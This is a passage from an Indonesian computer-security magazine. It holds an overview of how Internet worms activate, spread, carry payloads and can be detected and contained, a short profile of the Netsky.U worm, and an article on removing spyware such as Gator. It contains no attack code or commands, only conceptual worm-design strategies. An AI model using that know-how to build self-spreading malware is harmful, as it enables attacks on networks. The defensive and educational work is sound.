    Untuk memudahkan pembahasan, kita membatasi termi-nologi antara worm dan virus dengan mempertimbang-kan metode aktivasi yang dilakukan oleh sebuah worm,proses yang dilakukan sebuah worm untuk mengeksekusipada sebuah sistim komputer dan mekanisme penyeba-ran, proses yang memungkinkan sebuah worm berkelanadari satu host ke host yang lain.

    1.1. Metode Aktivasi

    Pengertian bagaimana worm dapat aktif pada sebuah host

    berhubungan erat dengan kemampuan worm un tuk me-nyebarkan diri, sejumlah worms dapat diatur untuk aktifsecara langsung (activated nearly immediately), sementa-ra yang lain dapat menunggu beberapa hari, minggu ataubahkan bulan untuk dapat teraktivasi dan kemudianmenyebarkan-dirinya.

    Aktivasi dengan intervensi user. Merupakan proses akti-vasi paling lambat karena membutuhkan intervensi useruntuk mengeksekusi worm tersebut, disadari maupuntidak oleh user tersebut. N amun karena sosialisasi yanggencar dilakukan m engenai bahaya worm dan virus, userdapat lebih cermat dengan t idak mengeksekusi programasing atau membuka attachment e-mail dari orang yangtidak dikenalnya, hal ini tentu akan memperlambat prosesaktivasi worm. Tetapi pembuat worm tidak putus asa de-

    ngan kondisi tersebut sehingga mereka melakukan tekniksocial engineering seperti yang dilakukan oleh virusMelissa yang seolah-olah mengirimkan informasi pentingdari orang yang telah dikenal oleh korban atau pesan-pesan personal lainnya yang dikirimkan oleh virusILOVEYOU. Walaupun Melissa adalah sebuah virus macropada program Microsoft Word namun dengan intervensiuser maka penyebaran Melissa di Internet sempat men-jadi ancaman yang paling menakutkan.

    Aktivasi terjadwal. Met ode aktivasi worm y ang lebih ce-

    pat adalah dengan menggunakan proses terjadwal padasistim (scheduled system proces). Ada banyak programyang berjalan pada lingkungan desktop maupun serveruntuk melakukan proses sesuai dengan jadwal yang dibe-rikan. Metode ini tetap membutuhkan intervesi manusianamun kali ini intervensi attacker yang dibutuhkan. Se-bagai contoh, program auto-update dari sistim yang me-lakukan proses updating ke server vendor. Dengan mela-kukan update ke remote host sebagai master, seorangattacker yang cerdik dapat memanfaatkan proses tersebutuntu k menyebarkan worm dengan terlebih dahulu m e-nguasai remote host atau gateway pada network maupundi Internet dan mengganti atau menginfeksi file yang di-butuhkan pada proses update dengan kode program worm.

    Ak tivasi mandiri. Metode aktivasi mandiri adalah metodetercepat worm dalam menggandakandiri, menyebar, danmenginfeksi host korban. Metode ini paling populer digu-nakan oleh para penulis worm. Umumnya worm yangmenggunakan metode ini memanfaatkan kelemahan-kelemahan sekuriti (security flaws) pada service yangumum digunakan. Sebagai contoh, worm CodeRed yangmengeksploitasi Webserver IIS. Worm akan menyertakandirinya pada service daemon yang sudah dikuasainya ataumengeksekusi perintah-perintah lain dengan privilegeyang sama dengan yang digunakan oleh daemon tersebut.Proses eksekusi tersebut akan berlangsung ketika wormmenemukan vulnerable service dan melakukan eksploitasiterhadap service tersebut.

    1.2. Mekanisme Penyebaran

    Worm menginfeksi host korban dan memasukkan kodeprogram sebagai bagian dari program worm ke dalamny a.Kode program ter sebut dapat berupa machine code, atauroutine untuk menjalankan program lain yang sudah adapada host korban. Dalam proses penyebarannya, wormharus mencari korban baru dan menginfeksi korban de-ngan salinan dirinya. Proses pendistribusian tersebut da-pat berlangsung sebagai proses distribusi satuan (dari satuhost ke host yang lain) atau sebagai proses distribusi ma-sal (dari satu host ke banyak host). Proses distribusi masaldipertimbangkan sebagai metode penyebaran tercepat de-ngan asumsi batasan yang digunakan adalah satuan wak-

    tu . Terdapat beberapa mekanisme penyebaran yang digu-

    A

    Autonomous Intrusion AgentsAutonomous Intrusion AgentsInternet Worm atau cacing yang dikenal terdapat internet sesungguhnya adalah Autonomous

    Intrusion Agents. Memiliki kemampuan menggandakan diri dengan memanfaatkan Security Flaws.Jim Geovedi & Bayu Kr isna ([email protected] & [email protected]) membahasnya untuk

    anda demi menambah wawasan mengenai Worm yang saat ini sedang booming menghiasi internet.

    COMPUTER SECURITYCOMPUTER SECURITY

  • 8/9/2019 NeoTek Vol. IV - No. 11

    10/48

    NeoStart

    10 NeoTek Vol. IV No. 11

    nakan worm un tuk menemu kan calon korban yaitu de-ngan m elakukan scanning, mencari korban berdasarkantarget list yang sudah dipersiapkan terlebih dahulu olehpenulis worm atau berdasarkan list yang ditemukan padasistim korban maupun di metaserver, serta melakukanmonitoring secara pasif.

    Scanning . Metode scanning melibatkan proses probingterhadap sejumlah alamat di Internet dan kemudian

    mengidentifikasi host yang vulnerable. Dua format seder-hana dari metode scanning adalah sequential (mencobamengidentifikasi sebuah blok alamat dari awal sampaiakhir) dan random (secara acak).

    Penyebaran worm dengan metode scanning baik sequen-tial maupun random, secara komparatif dapat dikatakanlambat, namu n jika dikombinasikan dengan aktivasi se-cara otomatis, worm dapat menyebar lebih cepat lagi.Worm yang menggunakan metode scanning biasanyamengeksploitasi security holes yang sudah ter identifikasisebelumnya sehingga secara relatif hanya akan mengin-feksi sejumlah host saja.

    Metode scanning lainnya yang dinilai cukup efektif ada-

    lah dengan menggunakan bandwidth-limited routine (se-perti yang digunakan oleh CodeRed, yaitu dengan mem-batasi target dengan latensi koneksi dari sistim yang su-dah terinfeksi dengan calon korban yang baru), mendefi-nisikan target yang hanya terdapat pada local address (se-perti dalam sebuah LAN maupun WAN), dan permutasipada proses pencarian.

    Scanning yang dilakukan worm t idaklah spesifik terh adapaplikasi sehingga attacker dapat menambahkan sebuahexploit baru pada sebuah worm yang sudah dikenal. Seba-gai contoh, worm Slapper mendapatkan muatan exploitbaru dan menjadikannya sebuah worm baru yaitu Scalper.

    Secara um um, kecepatan scanning yang dilakukan adalahterbatas pada kombinasi faktor seperti; jumlah mesin-mesin yang vulnerable, desain dari scanner, dan kemam-puan network monitoring system yang mampu meng-identifikasikan keberadaan worm dengan meningkatnyatrafik yang cukup signifikan.

    Target Lists. Sebuah worm dapat memiliki target list yangsudah ditentukan sebelumnya oleh penulis worm terse-but. Dengan target list yang sudah ditentukan terlebihdahulu membuat sebuah worm lebih cepat dalam menye-bar, namun tentu saja penyebaran tersebut akan sangatterbatas karena target berdasarkan sejumlah alamat di In-ternet yang sudah ditentukan.

    Selain itu, worm dapat menemukan list yang dibutuhkanpada host korban yang sudah dikuasainya, list ini umum-

    nya digunakan oleh worm yang metode penyebarannyaberdasarkan topologi network. Informasi yang didapatcontohnya adalah IP address sistim tersebut dan wormmengembangkannya menjadi sebuah subnet pada LANatau WAN.

    Target list juga dapat diperoleh pada metaserver (serveryang memberikan informasi sejumlah server yang memi-liki service yang sama). Sebagai contoh, metaserverGamespy memiliki daftar server yang menyediakanservice game online. Sebuah worm yang m emanfaatkanmetaserver akan melakukan query terlebih dahulu untu kmengetahui keberadaan target yang baru. Metode ini jugadapat mempercepat proses penyebaran sebuah worm yangmenyerang webserver, worm dapat menggunakan Google

    atau mesin pencari lainnya sebagai metaserver untukmenemukan target.

    Monitoring secara Pasif. Worm pasif tidak mencari kor-bannya, namun worm tersebut akan menunggu calonkorban potensial dan kemudian menginfeksinya. Walau-pun metode ini lebih lambat namun worm pasif tidakmenghasilkan Anomalous Traffic Patterns sehingga kebe-radaan mereka akan sulit diketahui. Sebagai contoh, anti-worm CRClean tidak membutuhkan aktivasi user, wormini menunggu serangan worm CodeRed dan turu nannya,

    kemudian melakukan respon dengan melakukan counter-attack. Jika proses counter-attack berhasil, CRClean akanmenghapus CodeRed dan menginfeksi korban denganmenginstal dirinya pada mesin. Sehingga CRClean dapatmenyebar tanpa melakukan proses scanning.

    2. Mot ivasi dan Muatan

    2.1. Motivasi Serangan

    Walaupun sangat penting unt uk mengetahui t eknologiyang digunakan oleh Internet worms, namun untuk dapatmemahami ancaman yang berasal dari sebuah worm seca-ra alami perlu dipahami motivasi dari intruders (sepertipenulis worm), serta jika memungkinkan dapat meng-identifikasi siapa sebenarnya intr uder t ersebut. Ada ba-nyak motivasi yang menyebabkan sebuah worm dibuatnamun berikut ini adalah motivasi umum yang menda-sari serangan worm.

    Pride and Power. Intruder (juga pembuat worm) termoti-vasi untuk mendapatkan kekuasaan dan show-off penge-tahuan mereka dengan merusak host orang lain. Intrudersini umu mnya tidak terorganisir dengan baik dan mene-mukan targetnya secara random. Jika mereka menemukansebuah sistim yang lemah dan vulnerable terhadap se-buah at tack maka mereka akan melangsungkan attackpada sistim tersebut.

    Keuntungan Komersial. Berkaitan dengan perkembangandunia ekonomi yang semakin hari semakin bergantung

    pada kinerja komputer untuk menjalankan operasionalbisnis sehari-hari, serangan elektronik yang ditujukan kesebuah domain dapat secara serius menganggu t ransaksiyang sedang berlangsung. Sebuah serangan worm dapatdilakukan untuk mendapatkan profit dengan melakukanmanipulasi finansial atau membatasi ruang-gerakkompetitor.

    Pemerasan. Karena sebuah worm dapat dibuat untuk me-langsungkan serangan DOS (Denial of Service) tanpahenti, pemerasan terhadap sebuah perusahaan dapatdilakukan dan serangan baru dapat dihentikan jika terjaditransaksi pembayaran sesuai yang diinginkan olehattacker. Motivasi ini lebih terorganisi secara individualmaupun kelompok.

    Protes. Seseorang yang memiliki pengetahuan yangcukup untuk menulis sebuah worm dapat melangsungkanserangan jika ia merasa dirugikan oleh suatu pihak ter -tentu. Ia melakukan protes terselubung dengan menye-barkan worm di Internet. Protes tersebut juga dapat ber-dampak negatif pada institusi yang menjadi target, sepertiSCO dan Microsoft yang baru-baru ini mendapatkan se-rangan DOS yang ditujukan kepadanya. Protes politikjuga dapat menjadi muatan dari serangan worm. Sebagaicontoh, worm Yaha Mail dibuat sebagai tool dari protespolitik yang diklaim sebagai pro India dan melakukanserangan DOS pada websites milik pemerintah Pakistan.

    Terorisme. Secara obyektif, worm dapat dimanfaatkan

    oleh kelompok teroris. Oleh karena ada banyak sistimkomputer yang terhubun gkan ke Internet berlokasi di

  • 8/9/2019 NeoTek Vol. IV - No. 11

    11/48

    NeoStart

    Vol. IV No. 11 NeoTek 11

    negara-negara maju, maka sebuah serangan worm dapatditujukan sebagai bentuk terorisme. Attacker dapat me-nyertakan muatan teror Al-Qaeda atau kelompok-kelompokanti-globalisasi lainnya untuk menyerang.

    2.2. Muatan (Payload)

    Berkaitan dengan motivasi penyebaran, muatan yang adapada sebuah worm dapat beragam. Berikut ini adalah mu-

    atan yang sering ditemukan pada worm.Tanpa muatan atau non-fungsional. Sebuah worm y angmemiliki bug pada kode program yang berhubungan me-tode penyebaran biasanya gagal untuk menyebar, namunworm yang memiliki bug pada muatannya tetap dapatmenyebar dan menimbulkan efek serius seperti pening-katan network tr affic atau secara aktif melakukan identi-fikasi host yang vulner able.

    Backdoor. Worm CodeRed II membuat sebuah backdoorpada host korban yang memungkinkan semua orang da-pat mengeksekusi program pada korban dari sebuahbrowser. Hal tersebut juga memicu peningkatan seranganworm anti-CodeRed yang berusaha mengeksploitasi back-door tersebut.

    Remote DOS . Muatan umum dari worm adalah kemam-puan unt uk m elakukan serangan DoS (Denial of Service).Worm tersebut memiliki tool yang dapat melakukan se-rangan terhadap sebuah target yang sudah ditentukan atautergantung pada komando seseorang yang membuatnyamampu melakukan serangan DDoS (Distributed Denial ofService).

    Melakukan update. Sejumlah worm terdahulu sepertiW32/Sonice memiliki muatan untuk melakukan update.W32/ Sonice melakukan proses query terhadap sejumlahwebsite untuk mendapatkan kode program yang baru ba-gi dirinya. Kemampuan ini dapat digunakan oleh DDoStool untuk melakukan update pada program-program

    yang m enjadi zombie. Jika kontrol un tuk melakukan up-date masih terus berlangsung maka sebuah modul exploitdapat disertakan sehingga menjadikan worm tersebutmampu menyebar lebih cepat dan mendapatkan korbanlebih banyak lagi.

    Spionase dan Pengumpulan Data. Worm dapat dilakukansebagai alat untu k melakukan spionasi dan pengum pulandata dengan m encari keyword tertentu seperti nomor kar-tu kredit atau informasi penting lainnya pada dokumen-dokumen yang tersimpan pada host yang sudah menjadikorban.

    Pengerusakan Data. Ada banyak virus dan worm yangmelakukan pengerusakan data seperti Chernobyl dan

    Klez, yang memiliki perintah-perint ah penghapusan data.Karena worm dapat menyebar dengan cepat, merekadapat mulai menghapus atau memanipulasi data dari awalproses infeksi.

    Pengerusakan Hardware. Walaupun sebagian besar BIOSmemiliki kemampuan untuk mencegah proses reflashing,beberapa worm memiliki routine yang mampu melaku-kan pengerusakan terhadap BIOS jenis tertentu.

    Coercion. Dengan muatan yang coercive, sebuah wormtidak menimbukan kerusakan kecuali jika worm ter sebutdiganggu. Sepert i worm yang memberikan pilihan padauser, mengijinkan worm tersebut tinggal pada sistim dantidak melakukan pengerusakan, atau menghapus wormtersebut namun menimbulkan efek yang bur uk dengankerusakan pada sistim.

    3. Mendeteksi Internet Worms

    Sebuah firewall telah dikembangkan sebagai alat untu kmendeteksi anomali traffic yang berasal dari Internet danmenghasilkan logfile yang memberikan peringatan bahwaworm menyerang dengan sebuah port tertentu sebagaitarget. Firewall dapat melakukan blocking akses sampaiadministrator melakukan analisis dan r ecovery jikadiperlukan.

    Masalah yang umum ditemukan dalam melakukan res-pon otomat is secara akurat adalah m endeteksi dan me-nganalisa sebuah worm yang sedang beroperasi danmenginfeksi ke sebuah network. Bagian ini mendiskusi-kan strategi-strategi yang telah eksis maupun baru dalammendeteksi keberadaan sebuah worm.

    Detektor dapat berupa sebuah komputer atau device lainyang berdiri sendiri, terletak pada DM Z (De-MilitarizedZone), atau pada sebuah backbone, yang memiliki ke-mampuan mendeteksi secara lokal atau terpusat. Apapundetektor yang digunakan haruslah sensitif dalam skalanetwork yang besar untu k mengurangi false positives danfalse negatives. Detektor dapat dikatakan berhasil jika

    mampu mendeteksi kejadian anomali dari beberapa tipeworm, kejadian anomali tersebut dapat diketahui dari polatrafik yang dihasilkan sebagai konsekuensi dari teknikpenyebaran worm tersebut.

    3.1 Deteksi pada Host

    Host detection . Program peer-to-peermaupun protokolWindows sharing dapat digunakan sebagai medium pe-nyebaran worm, akibatnya mekanisme query worm samaseperti yang dihasilkan oleh program peer-t o-peer biasa.Hal tersebut menyebabkan proses deteksi pada network-level akan mengalami kesulitan kecuali implementasi IDSdilakukan untu k mengenali pola-pola tersebut. Dalam im-plementasinya, IDS akan menganalisa pola-pola tert entu

    pada trafik berdasarkan signature database yang dimilikinya.Anti-virus Behavior Blocking. Behavior blocking adalahteknik yang digunakan antivirus dalam menghentikanprogram-program jahat dalam melakukan aksinya. Wa-laupun dinilai sebagai upaya y ang berhasil, teknik ini ti-dak diberdayakan secara luas karena faktor usability danfalse positives.

    W ormholes dan Honeyf arms. Sebuah honeypot adalahsebuah host yang ditujukan untuk dikuasai oleh intruderdalam upaya mendeteksi dan menganalisa perilaku intru-der. Honeypot yang didistribusikan pada sebuah network(honeynet) dapat membentuk detektor yang akurat ke-cuali faktor harga (terutama hardware dan admistrationcosts) menjadi faktor penghalang diimplementasikannyahoneynet.

    Sebagai contoh implementasi honeypot yang hemat ada-lah dengan membuat sebuah honeypot system pada net-work yang terpisah dari workstations atau server dan me-lakukan tr affic redirection pada port-port tertentu, yangdiduga sebagai trafik yang digunakan oleh worm untukmenyebar, ke honeypot tersebut. Sebuah honeypot dapatmenggunakan teknologi virtual machine untuk membuatimage dari banyak sistim yang vulnerable.

    3.2. Deteksi pada Network

    Deteksi pada LAN atau WAN. Sebuah mesin yang terin-feksi oleh worm akan menghasilkan trafik scanning yang

    dapat dideteksi. Proses deteksi dapat dilakukan pada gate-way atau IDS yang diletakkan diantara gateway dan LAN

  • 8/9/2019 NeoTek Vol. IV - No. 11

    12/48

    NeoStart

    12 NeoTek Vol. IV No. 11

    atau WAN.

    Deteksi pada level ISP atau Backbone. Telah diketahuibahwa untuk menyebarkan dirinya sebuah umumnyaworm melakukan proses scanning terlebih dahulu untukmenemukan target yang baru. Meningkatnya networktraffic ISP atau backbone secara dramatis dapat mengin-dikasikan bahwa worm telah menyerang networktersebut.

    4. Respon dan Recovery

    4.1. Respon

    Malware seperti worm dan virus dapat menyebar lebihcepat dari pada kemampuan manusia untuk menganalisadan meresponinya. Sebuah strategi pertahanan yang baikmenghadapi worm haruslah dapat dilakukan secara oto-matis. Sebuah respon otomatis dapat memperlambat danmembatasi ruang-gerak worm.

    Respon otomatis yang diberikan biasanya berupa blockingterhadap aktifitas worm. Kelemahan respon otomatisyang umum adalah terjadinya respon terhadap false posi-tive dan false negative. False positive adalah situasi dima-

    na respon diberikan namun tidak terjadi indikasi adanyaworm, sement ara false negative adalah situasi dimana wormbenar-benar menyerang namun respon tidak diberikan.

    Keputusan unt uk m enanggapi keberadaan worm padanetwork h aruslah bijak. Berarti dalam pengambilan se-buah keputusan tersebut haruslah berdasarkan analisateknis yang melibatkan banyak aspek seperti statistik,usage policy , maupun security advisory .

    Host Response. Sebuah proses respon pada sistim kompu -ter akan melibatkan personal firewall yang mampu mem-baca alerts yang dihasilkan oleh host-based IDS. Pada le-vel ini, respon yang diberikan dapat menjadi lebih efektifdalam membendung aktifitas worm.

    Network Response. Respon pada level ini haruslahmemungkinkan u ntuk mengkombinasikan teknikblocking ketika mendapat alert dan mampu memilah kelasdari trafik yang diduga sebagai worm yang sedangmenyebar. Network-based IDS seperti snort dan preludedapat digunakan untu k mengidentifikasi keberadaanworm dengan menganalisa network t raffic secara pasif.

    ISP Response. Walaupun tingkat kesulitan dalam melaku-kan respon otomatis pada level ini cukup tinggi, namunproteksi dengan skala sistim yang lebih besar dapat men-jadi pertimbangan. Implementasi respon otomatis pada le-vel ISP haruslah terlebih dahulu teruji dengan baikkarena terjadinya false positive dan false negative dapatdengan mudah terjadi.

    4.2. Recovery

    Proses recovery dipertimbangkan sebagai salah satu upayaunt uk memperlambat penyebaran worm. Dengan memu -lihkan kondisi sistim yang terin feksi setidaknya akan me-ngurangi sebuah penyebaran baru dari worm. Beberapametode berikut adalah u paya dalam melakukan recoveryterhadap serangan worm.

    Anti-worms. Walaupun bersifat ilegal dan kurang praktis,sebuah ant i-worm atau worm put ih dapat menu tupi secu -rity holes dan membatasi ruang-gerak worm jenis lain.Terlihat sangat atraktif namun beberapa batasan signifi-kan membuatnya bersifat tidak praktis, selain itu faktor

    hukum membuat ant i-worm tidak dibenarkan secarahukum. Batasan yang signifikan dari anti-worm adalah

    keterbatasannya untuk memperbaiki kerusakan yang di-timbulkan oleh satu jenis worm saja.

    Sekurang-kurangnya terdapat 3 (tiga) jenis anti-wormyang pernah ada di Internet:

    ? Cheese worm, yang m enyebar dengan m enggunakanbackdoor y ang dibuat oleh 1ion worm.

    ? Code Green, yang m emanfaatkan h ole yang dibuat

    oleh CodeRed II.? CRClean yang memberikan respon terhadap serangan

    CodeRed II.

    Distribution patch dan update. Metode recovery denganmendistribusikan patch update untuk program-programyang vulnerable pada sebuah sistim komputer dinilai se-bagai metode yang efektif. Proses distribusi dapat dilaku-kan oleh vendor software maupun adminstrator yang me-nangani sejumlah besar host pada LAN atau WAN.

    Salah satu kekurangan metode ini adalah ketika intruderdapat menggunakan worm untuk menguasai sejumlahbesar host dan melakukan DOS ke host lain yang akanmelakukan respon terhadap serangan worm tersebut. Tar-

    get dari DOS biasanya adalah vendor dar i program-program yang vulnerable dan dimanfaatkan oleh worm.

    5. Kesimpulan

    Sebagai autonomous intrusion agents, Internet wormsmerupakan ancaman bagi network dalam skala kecil mau-pun besar. Setelah diketahui bagaimana metode umumpenyebaran, mekanisme, motivasi dibuatnya sebuah worm,dan deteksi keberadaan worm pada sebuah host maupunnetwork, maka perlu penanganan secara serius dalam me-nanggulangi wabah Internet worms. Bagaimana mengan-tisipasi serangan worm saat ini maupun dimasa menda-tang yang lebih beragam menjadi sebuah pekerjaan ru -mah baru yang tidak mudah. Perlu kerjasama berbagai

    pihak terkait seperti penyelenggara jasa layanan aksesInternet agar tidak terjadi dampak yang lebih buruk.

    6. Referensi

    1. Vern Paxson, Stuart Staniford, and Nicholas Weaver,How to 0wn t he Internet in Your Spare Time, Proceedingsof the 11th USENIX Security Symposium (Security '02),2002.

    2. David Moore, Colleen Shannon, Geoffrey Voelker andStefan Savage, Internet Quarantine: Requirements forContaining Self-Propagating Code, Proceedings of the2003 IEEE Infocom Conferen ce, San Francisco, CA, Apr il2003.

    3. Jose Nazario, The Future of Internet Worms, BlackhatBriefings, July 2001.

    4. CERT, CERT Advisory CA-2000-04 Love Letter Worm,http://www.cert.org/advisories/CA-2000-04.html.

    5. Arno Wagner, Thomas Dbendorfer, Bernhard Plattner,Roman H iestand, Experiences with Worm PropagationSimulations, ACM Workshop on Rapid Malcode(WORM) 2003, November 2003.

    6. Nicholas C Weaver, Warhol Worms: The Potential forVery Fast Internet Plagues,http://www.cs.berkeley.edu/~nweaver/warhol.html.

    7. Eugene H. Spafford, The Internet Worm Program: AnAnalysis, ACM SIGCOMM Computer Commu nicationReview, 19(1):17--59, January 1989.

  • 8/9/2019 NeoTek Vol. IV - No. 11

    13/48

    NeoStart

    Vol. IV No. 11 NeoTek 13

    8. Paul Boutin, The Fix Is In Programmers can stopInternet worms. Will they?,http://slate.msn.com/id/2081943/

    9. Symantec, Security Response,http://securityresponse.symantec.com/

    10. Networm.org, The Worm Information Center,http://www.networm.org/

    7. Tambahan

    7.1. W32.Netsky.U

    W32.Netsky merupakan sebuah worm yang menganda-kan dirinya melalui e-mail yang dikirimkan secara masal.Memiliki banyak varian, sampai tulisan ini dibuat varianterbaru worm W32.Netsky adalah W32.Netsky.U@mm(juga dikenal sebagai W32/Netsky.u@MM, W32/Netsky-U, WORM_NETSKY.U, Win32.Netsky.U). Menginfeksisistim operasi Windows 2000, Windows 95, Windows 98,Windows Me, Windows NT, dan Windows XP.

    Muatan worm W32.Netsky.U adalah melakukan DoS kesejumlah website pada tanggal 14 April 2004 sampai 23

    April 2004, selain itu worm ini akan mengirimkan banyake-mail ke alamat yang diperoleh pada file yang terdapatpada host korban.

    W32.Netsky juga menginstal sebuah backdoor yang me-mun gkinkan seseorang dapat login ke dalam sistim t anpamelewati proses otentifikasi yang semestinya.

    Setelah berhasil mengeksploitasi host korban, W32.Netsky.Uakan meny alinkan diri sebagai % Windir% \ SymAV.exe(% Windir% merupakan variable dimana lokasi instalasidefault Windows berada). Selanjutnya worm tersebutakan melakukan serangkaian perintah seperti membuatmut ex, membuat sebuah file MIME-encoded, dan me-nambahkan sebuah entry pada registry Windows.

    Worm W32.Netsky.U menginstal sebuah backdoor yangmendengarkan port TCP 6789 yang memun gkinkan oranglain unt uk mengirimkan executable file dan kemudiansecara otomatis mengeksekusinya.

    Pada tanggal 14 April 2004 sampai 23 April 2004, wormakan melakukan serangan DoS ke sejumlah website se-perti: www.cracks.am, www.emule.de, www.kazaa.com,www.freemule.net, dan www.keygen.us.

    Untuk menyebarkan dirinya, worm W32.Netsky.U akanmelakukan pencarian sejumlah file seperti file yang ber-ekstensi .asp, .cgi, .html, .php, dan lain-lain guna menda -patkan daftar alamat e-mail yang nantikan akan dikirimisalinan worm tersebut. Dengan ukuran attachment sebe-sar 18,432 bytes dan target yang banyak, network yangterkena worm ini dapat dipastikan akan mengalami gang-guan dengan terjadinya lonjakan trafik pada transmisi e-mail.

    Informasi detail mengenai W32.Netsky.U serta bagaima-na cara mengatasinya dapat dilihat pada website Symantec,www.symantec.com/avcenter/venc/data/[email protected]

    7.2. Lonjakan Network Traffic

    Selama bulan Februari sampai Maret 2004, networkPT. BoNET Utama (salah satu subnet ISP IndoNET yangberlokasi di Bogor), telah terjadi serangkaian gangguanpada network akibat penyebaran worm yang menginfeksisejumlah besar klien dial-up dan wireless.

    Umumnya, POP (Point of Presence) Bonet Pajajaran setiapharinya mendistribusikan traffik dengan rata-rata 750 kbps.

    Ketika worm sedang aktif untuk melakukan scanningatau mengirimkan e-mail secara massal, terjadi lonjakannetwork traffic yang cukup drastis mencapai 90 Mbps.

    8. Kredit

    Michael S. Sunggiardi dan Team BoNET, Judith MS,Hengky Anwar, Stephen Chen, Syam A. Yanuar,

    Y. Fery Wibowo, Chiank, Dominick Dreiser, RezaMuh ammad, Randi Malikul Mulki, Arif Wicaksono,Indra Kusuma, D. Wangsa Sunary a.

    CoreBSD Digital Research Group adalah sekelompok anak muda yang

    tertarik pada bidang computer security dan sistim operasi komputer

    *BSD. Kelompok yang tidak pernah mendeklarasikan secara resmi

    kapan berdirinya, berkumpul pada sebuah ruang chat #corebsd di IRC

    server Efnet. Informasi lengkap mengenai kelompok CoreBSD dapat

    dilihat pada website h ttp:// corebsd.or.id/

    Gambar 1. Lonjakan Network Traffic; penyebaran worm yang

    menginfeksi sejumlah besar klien dial-up dan wireless.

    Gambar 2. Lonjakan Network Traffic; worm melakukan scanning ataumengirimkan e-mail secara massal.

  • 8/9/2019 NeoTek Vol. IV - No. 11

    14/48

    NeoStart

    14 NeoTek Vol. IV No. 11

    PABILA KITA SEDANG BERSELANCAR DI INTERNET MA-ka kita akan menemui hal-hal yang baru, mu laidari perkembangan teknologi internet itu sendiri

    sampai perkembangan software. Namun pernakah ketikaanda berkunjung ke sebuah WebShopping un tuk m elihat-lihat produk dan info yang sedang anda cari? Tiba-tibamuncul pop-up menu yang menginformasikan untukmenginstal sebuah program baru untuk mengawasi kinerjaPC anda. Tetapi setelah di-install malah lebih banyak meng-ganggu kegiatan berselancar anda.

    Kejadian di atas mun gkin sering kita alami, bahasan kaliini akan menjelaskan apa itu scumware?Scumware adalahsebuah sebutan untuk tool penggangu seperti yang telahdisebutkan sebelumnya di atas. Scumware sendiri terdiridari spyware, adware, sneakware, dan scamware.

    Spyware adalah sebuah program kecil yang memiliki ke-mampuan layaknya seperti mata-mata dengan merekamaktivitas berselancar anda di internet dan lain sebagainya,kemudian tool ini akan menyimpan rekaman tersebut danmengirimkannya ke si pembuat tool ini. Mirip dengankeylogger dan trojan.

    Adware mungkin sudah tidak jarang lagi ditemukan bah-kan hampir setiap kali tersambung ke internet programini akan selalu menawarkan jasa-jasanya dalam bentukgambar atau bentuk lainnya, dan juga bisa memata-mataiseperti spyware.

    Spamware juga bersifat sama seperti adware. Semua tooldi atas merupakan kerjaan dari sebuah perusahaan dengancara mengiklankan produk mereka secara massal dan mainhantam kromo semua pengguna internet.

    Bagaimana anda bisa terinfeksi scum ware?Seperti di awalpembahasan, tergiur akan tawaran program gratis untuk diinstal di PC anda, tanpa disadari jika anda mengikuti ta-waran itu adalah sebuah keputusan yang salah. Salah satudari scumware ada Gator/ GAIN, dimana gator merupakansebuah spyware yang paling dibenci pengguna internet.

    Gator memiliki beberapa komponen didalamnya antaralain: gator, OfferCOmpanion, Trickler, GAIN, GMT.exe,CMESys.exe dan lainnya. Gator sendiri menyebar denganmeleburkan dirinya ke dalam file-file program sharingseperti kazza, iMesh dan lainnya.

    Gator memiliki 2 tujuan ut ama yaitu :

    ? ? engirimkan iklan-iklan kepada user.

    ? Mengumpulkan informasi tentang kebiasan user danmengirimkan kembali ke server utama gator.

    Menghilangkan Gator

    Gator terinstall di dalam folder C:\Program files\ Gator\ dandi registry windows dengan nama GAIN diHKEY_LOCAL_MACHINE>Software>Microsoft>Windows>Current

    version>Run . GMT sendiri terdapat di C:\program

    files\common files\GMT\ dan di C:\Windows\StartMenu\Programs\StartUp\sedangkan file Cmiie bisa ditemu-kan di C:\program files\Common Files\. Anda bisa menghapusfile-file bawaan gator tersebut, namun untuk menghapusregistry keynya anda sebaiknya mem-back up terlebihdahulu sebelumnya agar terhindar dari masalah.

    Selanjutnya non-aktifkan startup Gator di MSconfig-Startup lalu cari GAIN ataupun Gator, dan hilangkantanda centangny a.

    Hilangkan Scumware Dengan NoAdware

    Apabila anda ragu dengan cara konvensional seperti di atasmaka banyak sekali tools-tools untuk menghilangkanscumware. Namun untuk memilih yang benar-benar meng-hilangkan memang sukar, karena terkadang program antiadwarenya sendiri telah terjangkiti scumware.

    Ketika browse untuk mencari referensi tentang scumwaresaya mendapatkan referensi tentang tool-tool anti scumwaredan salah satunya adalah NoAdware. Ketika saya coba dirumah, program ini berguna untuk melakukan scanningPC dari ware-ware yang tidak berguna. Silahkan andamendownloadnya di www.noadware.net.

    Dengan interface yang friendly user, tool ini dapat andadengan mudah tetapi tool ini shareware dengan m asaaktif trial 45 hari, ditambah lagi menu Remove untuk

    A

    ScumwareScumwareBerselancar di Internet yang biasa kita lakukan sehari-hari, ternyata tidak terlepas dari hal-hal yang

    dapat mengganggu kenyamanan bahkan yang terburuk yaitu merusak privacy. Andi Ismayadi([email protected]) membeberkan hal yang mungkin akan kita temui nantinya ketika

    berselancar di internet seperti spyware dan lain sebagainya.

    COMPUTER SECURITYCOMPUTER SECURITY

    Gambar 2. Program NoAdware

    Gambar 1. MSconfig-Startup

  • 8/9/2019 NeoTek Vol. IV - No. 11

    15/48

    NeoStart

    Vol. IV No. 11 NeoTek 15

    yang berfungsi untuk menghilangkan scumware di non-aktifkan. Namun anda dapat membeli serial number-nyadi website resminya.

    Klik tombol scan My PC, maka NoAdware segera melakukanscanning di PC anda dari scumware. Akan ter lihat nant i-nya file-file scumware apa saja yang terdapat dalam PC.Bahkan keylogger pun ikut t erlihat keberadaannya. Jikameng-klik nama dari scumware ter sebut, terlihat di kolom

    item description keterangan tingkat bahaya dan tipe dariscumware yang tertangkap menyusup di PC.

    Tools lain yang sebanding dengannya adalah adaware darilavasoft, www.lavasoftu sa.com.

    Tool lain yang dapat digunakan dalam memerangi scumwareyang sangat saya kagumi dikarenakan sifatnya sepertiAnti Virus PC-Cillin yang bisa memonitor aktivitas sebuahvirus. ZeroSpyware, program yang dimaksudkan adalahsebuah Real Time Anti Spyware Monitor Program , ke-mampuannya memonitor file-file yang masuk maupun

    yang telah bera-da didalam kom-puter y ang didu-ga sebagaiSpyware yang

    selanjutnya nan-ti akan dicekal(cegah tangkal)jika ditemukanakan memasuk-kannya ke ka-

    rant ina. Didalam karantina anda dapat melihat keterangandari sebuah spyware sendiri, dimana letak keberadaannyadan menghapusnya.

